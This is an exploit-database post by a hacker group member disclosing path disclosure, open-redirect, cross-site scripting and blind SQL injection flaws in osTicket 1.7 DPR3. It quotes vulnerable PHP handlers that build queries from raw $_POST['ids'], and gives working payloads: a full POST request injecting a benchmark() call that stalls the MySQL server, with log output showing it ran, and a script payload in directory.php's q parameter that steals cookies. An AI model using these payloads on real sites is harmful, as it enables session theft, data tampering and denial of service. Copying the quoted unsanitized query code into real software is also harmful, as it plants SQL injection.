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osTicket 1.7 DPR3 XSS / Disclosure / Redirect / SQL Injection Vulnerabilities
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm AkaStep member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ================================================= Vulnerable Software: osTicket (v1.7-DPR3) Official Site:http://www.osticket.com Tested Version: osTicket (v1.7-DPR3) Vulns: PATH DISCLOSURE+XSS+Open Redirect+Blind SQLi ================================================= ================================================= Tested on: *php.ini MAGIC_QUOTES_GPC OFF* Safe mode off /* OS: Windows XP SP2 (32 bit) Apache: PHP Version: MYSQL: 5.5.24 */ ================================================= osTicket (v1.7-DPR3) My suggestion is that:If possible after sucessfully installation of application give to user to protect that setup/ dir like button: When the user press OK~PROTECT THIS DIR~ automatically create .htaccess(deny from all) file in setup/ dir. Ok,now about vulns. ---------------------Open Redirect VUln-------------------------- l.php Open Redirect vulnerability.(Usefull for Phish) If possible limit it only your to your own domain only. + If possible tokenize it too (antiCSRF to avoid risk) ------------------------------------------------------------------ =============================l.php XSS================================================ l.php XSS or script insertion. // $url unsanitized <?php /********************************************************************* l.php Link redirection Jared Hancock <jared@osticket.com> Copyright (c) 2006-2012 osTicket http://www.osticket.com Released under the GNU General Public License WITHOUT ANY WARRANTY. See LICENSE.TXT for details. vim: expandtab sw=4 ts=4 sts=4: **********************************************************************/ require 'secure.inc.php'; global $_GET; $url = $_GET['url']; if (!$url) exit(); ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"/> <meta http-equiv="refresh" content="0;<?php echo $url; ?>"/> </head> <body/> </html> =========================================================================================== /include/ dir missing .htaccess (deny from all). ==================scp/l.php================================================================ /scp/l.php<script>alert(1);</script> XSS same l.php issuse: =========================================================================================== scp/slas.php BLIND SQL injection due direct usage $_POST['ids'] without sanitization (needs db_input()) ====================scp/slas.php==================================================================== <?php /********************************************************************* slas.php SLA - Service Level Agreements Peter Rotich <peter@osticket.com> Copyright (c) 2006-2012 osTicket http://www.osticket.com Released under the GNU General Public License WITHOUT ANY WARRANTY. See LICENSE.TXT for details. vim: expandtab sw=4 ts=4 sts=4: **********************************************************************/ require('admin.inc.php'); include_once(INCLUDE_DIR.'class.sla.php'); $sla=null; if($_REQUEST['id'] && !($sla=SLA::lookup($_REQUEST['id']))) $errors['err']='Unknown or invalid API key ID.'; if($_POST){ switch(strtolower($_POST['do'])){ case 'update': if(!$sla){ $errors['err']='Unknown or invalid SLA plan.'; }elseif($sla->update($_POST,$errors)){ $msg='SLA plan updated successfully'; }elseif(!$errors['err']){ $errors['err']='Error updating SLA plan. Try again!'; } break; case 'add': if(($id=SLA::create($_POST,$errors))){ $msg='SLA plan added successfully'; $_REQUEST['a']=null; }elseif(!$errors['err']){ $errors['err']='Unable to add SLA plan. Correct error(s) below and try again.'; } break; case 'mass_process': if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) { $errors['err']='You must select at least one plan.'; }else{ $count=count($_POST['ids']); if($_POST['enable']){ $sql='UPDATE '.SLA_TABLE.' SET isactive=1 WHERE id IN ('.implode(',',$_POST['ids']).')'; if(db_query($sql) && ($num=db_affected_rows())){ if($num==$count) $msg='Selected SLA plans enabled'; else $warn="$num of $count selected SLA plans enabled"; }else{ $errors['err']='Unable to enable selected SLA plans.'; } }elseif($_POST['disable']){ $sql='UPDATE '.SLA_TABLE.' SET isactive=0 WHERE id IN ('.implode(',',$_POST['ids']).')'; if(db_query($sql) && ($num=db_affected_rows())) { if($num==$count) $msg='Selected SLA plans disabled'; else $warn="$num of $count selected SLA plans disabled"; }else{ $errors['err']='Unable to disable selected SLA plans'; } }elseif($_POST['delete']){ $i=0; foreach($_POST['ids'] as $k=>$v) { if(($p=SLA::lookup($v)) && $p->delete()) $i++; } if($i && $i==$count) $msg='Selected SLA plans deleted successfully'; elseif($i>0) $warn="$i of $count selected SLA plans deleted"; elseif(!$errors['err']) $errors['err']='Unable to delete selected SLA plans'; }else { $errors['err']='Unknown action'; } } break; default: $errors['err']='Unknown action'; break; } } $page='slaplans.inc.php'; if($sla || ($_REQUEST['a'] && !strcasecmp($_REQUEST['a'],'add'))) $page='slaplan.inc.php'; $nav->setTabActive('settings'); require(STAFFINC_DIR.'header.inc.php'); require(STAFFINC_DIR.$page); include(STAFFINC_DIR.'footer.inc.php'); ?> ============================================================================================= Warning: is_readable() [function.is-readable]: open_basedir restriction in effect. File(/dev/urandom) is not within the allowed path(s): (C:/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn;C:\DOCUME~1\Apache\LOCALS~1\Temp) in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ostickRC\include\PasswordHash.php on line 51 BLIND SQL INJECTION.(I'm using here becnhmark() way to be more "sensitive" and detect vuln) //scp/staff.php again due direct usage implode(',',$_POST['ids']) in sql query without db_input(). snip from scp/staff.php =============================================================================================== case 'mass_process': if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) { $errors['err']='You must select at least one staff member.'; }elseif(in_array($thisstaff->getId(),$_POST['ids'])) { $errors['err']='You can not disable/delete yourself - you could be the only admin!'; }else{ $count=count($_POST['ids']); if($_POST['enable']){ $sql='UPDATE '.STAFF_TABLE.' SET isactive=1 WHERE staff_id IN ('.implode(',',$_POST['ids']).')'; if(db_query($sql) && ($num=db_affected_rows())){ if($num==$count) $msg='Selected staff activated'; else $warn="$num of $count selected staff activated"; }else{ $errors['err']='Unable to activate selected staff'; } }elseif($_POST['disable']){ $sql='UPDATE '.STAFF_TABLE.' SET isactive=0 '. 'WHERE staff_id IN ('.implode(',',$_POST['ids']).') AND staff_id!='.db_input($thisstaff->getId()); if(db_query($sql) && ($num=db_affected_rows())) { if($num==$count) $msg='Selected staff disabled'; =============================================================================================== POST HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Referer: Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt) Host: Content-Length: 90 Cookie: ASPX=6372nnqs3u1oplhouh99s7b6a6rh7j66 do=mass_process&ids%5B%5D=1) or benchmark(50000000000000,md5(now())) or (1=0&enable=Enable Works and i'm getting: Possible DOS Attack Against MYSQL Server [Prevented] Attack Prevented on: 16:04:02:468 01/06/2012 Attack Duration: 15 seconds Command: Query db: ost Host: worker.com:1182 User: ost Id: 548 Time: 15 State: init Info: UPDATE ost170_staff SET isactive=1 WHERE staff_id IN (1) or benchmark(50000000000000,md5(now())) or (1=0) ======================================================================================================================= Returned status code: http:504 [Fiddler] ReadResponse() failed: The server did not return a response for this request. ==============================================XSS================================================== XSS: try to move your mouse over: Page: [1] Export you will see it. parameter &status is vulnerable in this case. ==================================================================================================== Possible prone to sql injection: include/class.staff.php Notice: $teams //$sql.=' AND team_id NOT IN('.implode(',', $teams).')'; Snip: ================================= function updateTeams($teams) { if($teams) { foreach($teams as $k=>$id) { $sql='INSERT IGNORE INTO '.TEAM_MEMBER_TABLE.' SET updated=NOW() ' .' ,staff_id='.db_input($this->getId()).', team_id='.db_input($id); db_query($sql); } } $sql='DELETE FROM '.TEAM_MEMBER_TABLE.' WHERE staff_id='.db_input($this->getId()); if($teams) $sql.=' AND team_id NOT IN('.implode(',', $teams).')'; db_query($sql); return true; } =================================== =================================================================================================== //include/class.staff.php If possible sanitize all vars before passing it to syslogs: ============================= SNIP ================================= //If we get to this point we know the login failed. $_SESSION['_staff']['strikes']+=1; if(!$errors && $_SESSION['_staff']['strikes']>$cfg->getStaffMaxLogins()) { $errors['err']='Forgot your login info? Contact Admin.'; $_SESSION['_staff']['laststrike']=time(); $alert='Excessive login attempts by a staff member?'."\n". 'Username: '.$_POST['username']."\n".'IP: '.$_SERVER['REMOTE_ADDR']."\n".'TIME: '.date('M j, Y, g:i a T')."\n\n". 'Attempts #'.$_SESSION['_staff']['strikes']."\n".'Timeout: '.($cfg->getStaffLoginTimeout()/60)." minutes \n\n"; Sys::log(LOG_ALERT,'Excessive login attempts ('.$_POST['username'].')', $alert,($cfg->alertONLoginError())); } elseif($_SESSION['_staff']['strikes']%2==0) { //Log every other failed login attempt as a warning. $alert='Username: '.$_POST['username']."\n".'IP: '.$_SERVER['REMOTE_ADDR']. "\n".'TIME: '.date('M j, Y, g:i a T')."\n\n".'Attempts #'.$_SESSION['_staff']['strikes']; Sys::log(LOG_WARNING,'Failed staff login attempt ('.$_POST['username'].')', $alert); } return false; } ============================= EOF SNIP=============================== scp/departments.php SQL injection: =========================================================================== case 'mass_process': if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) { $errors['err']='You must select at least one department'; }elseif(!$_POST['public'] && in_array($cfg->getDefaultDeptId(),$_POST['ids'])) { $errors['err']='You can not disable/delete a default department. Remove default Dept. and try again.'; }else{ $count=count($_POST['ids']); if($_POST['public']){ $sql='UPDATE '.DEPT_TABLE.' SET ispublic=1 WHERE dept_id IN ('.implode(',',$_POST['ids']).')'; if(db_query($sql) && ($num=db_affected_rows())){ if($num==$count) $msg='Selected departments made public'; else $warn="$num of $count selected departments made public"; }else{ $errors['err']='Unable to make selected department public.'; } }elseif($_POST['private']){ $sql='UPDATE '.DEPT_TABLE.' SET ispublic=0 '. 'WHERE dept_id IN ('.implode(',',$_POST['ids']).') AND dept_id!='.db_input($cfg->getDefaultDeptId()); if(db_query($sql) && ($num=db_affected_rows())) { if($num==$count) $msg='Selected departments made private'; else $warn="$num of $count selected departments made private"; }else{ $errors['err']='Unable to make selected department(s) private. Possibly already private!'; } }elseif($_POST['delete']){ //Deny all deletes if one of the selections has members in it. $sql='SELECT count(staff_id) FROM '.STAFF_TABLE.' WHERE dept_id IN ('.implode(',',$_POST['ids']).')'; list($members)=db_fetch_row(db_query($sql)); if($members) ============================================================================ ============================================================================ //scp/templates.php blind SQL injection case 'mass_process': if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) { $errors['err']='You must select at least one template to process.'; }else{ $count=count($_POST['ids']); if($_POST['enable']){ $sql='UPDATE '.EMAIL_TEMPLATE_TABLE.' SET isactive=1 WHERE tpl_id IN ('.implode(',',$_POST['ids']).')'; if(db_query($sql) && ($num=db_affected_rows())){ if($num==$count) $msg='Selected templates enabled'; else $warn="$num of $count selected templates enabled"; }else{ ======================= EOF SNIP======================= //scp/teams.php Blind SQl injection again: Notice: WHERE team_id IN ('.implode(',',$_POST['ids']).') case 'mass_process': if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) { $errors['err']='You must select at least one team.'; }else{ $count=count($_POST['ids']); if($_POST['enable']){ $sql='UPDATE '.TEAM_TABLE.' SET isenabled=1 WHERE team_id IN ('.implode(',',$_POST['ids']).')'; if(db_query($sql) && ($num=db_affected_rows())){ if($num==$count) $msg='Selected teams activated'; else $warn="$num of $count selected teams activated"; }else{ $errors['err']='Unable to activate selected teams'; } }elseif($_POST['disable']){ $sql='UPDATE '.TEAM_TABLE.' SET isenabled=0 WHERE team_id IN ('.implode(',',$_POST['ids']).')'; if(db_query($sql) && ($num=db_affected_rows())) { ============================================================= //scp/syslogs.php Blind Sql Injection: case 'mass_process': if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) { $errors['err']='You must select at least one log to delete'; }else{ $count=count($_POST['ids']); if($_POST['delete']){ $sql='DELETE FROM '.SYSLOG_TABLE.' WHERE log_id IN ('.implode(',',$_POST['ids']).')'; ============================================================== //scp/helptopics.php Blind SQL Injection: case 'mass_process': if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) { $errors['err']='You must select at least one help topic'; }else{ $count=count($_POST['ids']); if($_POST['enable']){ $sql='UPDATE '.TOPIC_TABLE.' SET isactive=1 WHERE topic_id IN ('.implode(',',$_POST['ids']).')'; if(db_query($sql) && ($num=db_affected_rows())){ if($num==$count) $msg='Selected help topics enabled'; else $warn="$num of $count selected help topics enabled"; }else{ $errors['err']='Unable to enable selected help topics.'; } }elseif($_POST['disable']){ $sql='UPDATE '.TOPIC_TABLE.' SET isactive=0 WHERE topic_id IN ('.implode(',',$_POST['ids']).')'; if(db_query($sql) && ($num=db_affected_rows())) { ============================================================= ============================================================= //scp/groups.php Blind Sql Injection again due implode(',',$_POST['ids']) thing in sql query. case 'mass_process': if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) { $errors['err']='You must select at least one group.'; }else{ $count=count($_POST['ids']); if($_POST['enable']){ $sql='UPDATE '.GROUP_TABLE.' SET group_enabled=1, updated=NOW() WHERE group_id IN ('.implode(',',$_POST['ids']).')'; if(db_query($sql) && ($num=db_affected_rows())){ if($num==$count) $msg='Selected groups activated'; else $warn="$num of $count selected groups activated"; }else{ $errors['err']='Unable to activate selected groups'; } }elseif($_POST['disable']){ $sql='UPDATE '.GROUP_TABLE.' SET group_enabled=0, updated=NOW() WHERE group_id IN ('.implode(',',$_POST['ids']).')'; ============================================================ //scp/filters.php Blind Sql Injection: ==================SNIP======================================== case 'mass_process': if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) { $errors['err']='You must select at least one filter to process.'; }else{ $count=count($_POST['ids']); if($_POST['enable']){ $sql='UPDATE '.EMAIL_FILTER_TABLE.' SET isactive=1 WHERE id IN ('.implode(',',$_POST['ids']).')'; if(db_query($sql) && ($num=db_affected_rows())){ if($num==$count) $msg='Selected filters enabled'; else $warn="$num of $count selected filters enabled"; }else{ $errors['err']='Unable to enable selected filters'; } }elseif($_POST['disable']){ $sql='UPDATE '.EMAIL_FILTER_TABLE.' SET isactive=0 WHERE id IN ('.implode(',',$_POST['ids']).')'; if(db_query($sql) && ($num=db_affected_rows())) { if($num==$count) $msg='Selected filters disabled'; else =====================EOF SNIP================================= include/class.faq.php Vulnerable to Blind SQL Injection but a bit hard to exploit it. Notice: if($ids) $sql.=' AND topic_id NOT IN('.implode(',',$ids).')'; db_query($sql); ==================SNIP======================================== function updateTopics($ids){ if($ids) { $topics = $this->getHelpTopicsIds(); foreach($ids as $k=>$id) { if($topics && in_array($id,$topics)) continue; $sql='INSERT IGNORE INTO '.FAQ_TOPIC_TABLE .' SET faq_id='.db_input($this->getId()) .', topic_id='.db_input($id); db_query($sql); } } $sql='DELETE FROM '.FAQ_TOPIC_TABLE.' WHERE faq_id='.db_input($this->getId()); if($ids) $sql.=' AND topic_id NOT IN('.implode(',',$ids).')'; db_query($sql); return true; } =====================EOF SNIP================================= /scp/emails.php Blind SQl Injection: ===================SNIP========================== case 'mass_process': if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) { $errors['err']='You must select at least one email address'; }else{ $count=count($_POST['ids']); $sql='SELECT count(dept_id) FROM '.DEPT_TABLE.' dept '. 'WHERE email_id IN ('.implode(',',$_POST['ids']).') OR autoresp_email_id IN ('.implode(',',$_POST['ids']).')'; list($depts)=db_fetch_row(db_query($sql)); ==================EOF============================= //scp/categories.php Blind SQl Inj: Notice: usage of implode(',',$_POST['ids']) directly without any sanitization in SQL query. ===================SNIP========================== case 'mass_process': if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) { $errors['err']='You must select at least one category'; } else { $count=count($_POST['ids']); if($_POST['public']) { $sql='UPDATE '.FAQ_CATEGORY_TABLE.' SET ispublic=1 WHERE category_id IN ('.implode(',',$_POST['ids']).')'; if(db_query($sql) && ($num=db_affected_rows())) { if($num==$count) $msg='Selected categories made PUBLIC'; else $warn="$num of $count selected categories made PUBLIC"; } else { $errors['err']='Unable to enable selected categories public.'; } } elseif($_POST['private']) { $sql='UPDATE '.FAQ_CATEGORY_TABLE.' SET ispublic=0 WHERE category_id IN ('.implode(',',$_POST['ids']).')'; if(db_query($sql) && ($num=db_affected_rows())) { if($num==$count) $msg='Selected categories made PRIVATE'; =====================EOF SNIP================================= //scp/canned.php Blind SQl Injection: ===================SNIP========================== case 'mass_process': if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) { $errors['err']='You must select at least one canned response'; } else { $count=count($_POST['ids']); if($_POST['enable']) { $sql='UPDATE '.CANNED_TABLE.' SET isenabled=1 WHERE canned_id IN ('.implode(',',$_POST['ids']).')'; if(db_query($sql) && ($num=db_affected_rows())) { if($num==$count) $msg='Selected canned replies enabled'; else $warn="$num of $count selected canned replies enabled"; } else { $errors['err']='Unable to enable selected canned replies.'; } } elseif($_POST['disable']) { $sql='UPDATE '.CANNED_TABLE.' SET isenabled=0 WHERE canned_id IN ('.implode(',',$_POST['ids']).')'; if(db_query($sql) && ($num=db_affected_rows())) { if($num==$count) $msg='Selected canned replies disabled'; else $warn="$num of $count selected canned replies disabled"; } else { =====================EOF SNIP======================== //scp//banlist.php Blind SQl Injection: Notice: ' AND id IN ('.implode(',',$_POST['ids']).')' ===================SNIP========================== case 'mass_process': if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) { $errors['err']='You must select at least one email to process.'; }else{ $count=count($_POST['ids']); if($_POST['enable']){ $sql='UPDATE '.EMAIL_FILTER_RULE_TABLE.' SET isactive=1 WHERE filter_id='.db_input($filter->getId()). ' AND id IN ('.implode(',',$_POST['ids']).')'; if(db_query($sql) && ($num=db_affected_rows())){ if($num==$count) $msg='Selected emails ban status set to enabled'; else $warn="$num of $count selected emails enabled"; }else{ $errors['err']='Unable to enable selected emails'; } }elseif($_POST['disable']){ $sql='UPDATE '.EMAIL_FILTER_RULE_TABLE.' SET isactive=0 WHERE filter_id='.db_input($filter->getId()). ' AND id IN ('.implode(',',$_POST['ids']).')'; =====================EOF SNIP======================== //scp/apikeys.php ===================SNIP========================== case 'mass_process': if(!$_POST['ids'] || !is_array($_POST['ids']) || !count($_POST['ids'])) { $errors['err']='You must select at least one API key'; }else{ $count=count($_POST['ids']); if($_POST['enable']){ $sql='UPDATE '.API_KEY_TABLE.' SET isactive=1 WHERE id IN ('.implode(',',$_POST['ids']).')'; if(db_query($sql) && ($num=db_affected_rows())){ if($num==$count) $msg='Selected API keys enabled'; else $warn="$num of $count selected API keys enabled"; }else{ $errors['err']='Unable to enable selected API keys.'; } }elseif($_POST['disable']){ $sql='UPDATE '.API_KEY_TABLE.' SET isactive=0 WHERE id IN ('.implode(',',$_POST['ids']).')'; if(db_query($sql) && ($num=db_affected_rows())) { if($num==$count) $msg='Selected API keys disabled'; else =====================EOF SNIP======================== XSS (Cross Site Scripting Vuln) directory.php parameter q. parameter &q is vulnerable in this case;%3C/script%3E Payload: "/><script>alert(document.cookie);</script>" >From source of code page: <form action="directory.php" method="GET" name="filter"> <input type="text" name="q" value="100"/><script>alert(document.cookie);</script>" > <select name="did" id="did"> <option value="0">— All Department —</option> <option value="2" >Billing (1)</option><option value="1" >Support (1)</option> </select> &nbps;&nbps; <input type="submit" name="submit" value="Filter"/> </form> And obviously we will get cookie. =========================== HAPPY NEW YEAR! ================================== ================================================ SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS: ================================================ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * To All Turkish Hackers Also special thanks to: ottoman38 & HERO_AZE ================================================ /AkaStep # 0day.today [2024-12-26] #